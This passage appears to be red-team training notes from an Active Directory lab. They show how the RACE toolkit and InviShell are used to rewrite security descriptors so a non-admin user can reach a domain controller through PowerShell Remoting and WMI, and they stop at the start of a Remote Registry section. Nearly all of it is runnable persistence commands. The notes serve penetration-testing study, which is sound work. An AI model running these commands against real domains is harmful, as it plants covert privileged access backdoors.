It is possible to modify SD like Owner, primary group, DACL, SACL of multiple remote access methods (securable objects) to allow access to non-admin users.
Admin privileges are required to modify SD.
ACLs can be modified to allow non-admin users access securable objects.
PowerShell Remoting:
Use RACE toolkit, either PSRemoting or WMI
Using PSRemoting
# Using PSRemoting
# Run InviShell
# First of all run (to import RACE Toolikit) -:
. C:\AD\Tools\RACE-master\RACE.ps1
# On local machine for student1, open elevated cmd:
# This reads the existing ACL for root namespace and DCOM and add an entry for our SID.
Set-RemotePSRemoting -SamAccountName student1 -Verbose
# On remote machine for student1 without credentials:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Verbose
# Connect to dcorp-dc as student
Enter-PSSession -ComputerName dcorp-dc
# To remove the permissions on remote machine:
Set-RemotePSRemoting -SamAccountName student1 -ComputerName dcorp-dc -Remove
Using WMI
# OR Using WMI
Set-RemoteWMI -SamAccountName student1 -Verbose
# On remote machine for student1 without credentials:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
# On remote machine remove permissions:
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc-namespace 'root\cimv2' -Remove -Verbose
# Now we can run WMI queries on DC as student.
powershell
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
Remote Registry:
Using RACE or DAMP, with admin privs on remote machine (Make sure to run this first) -: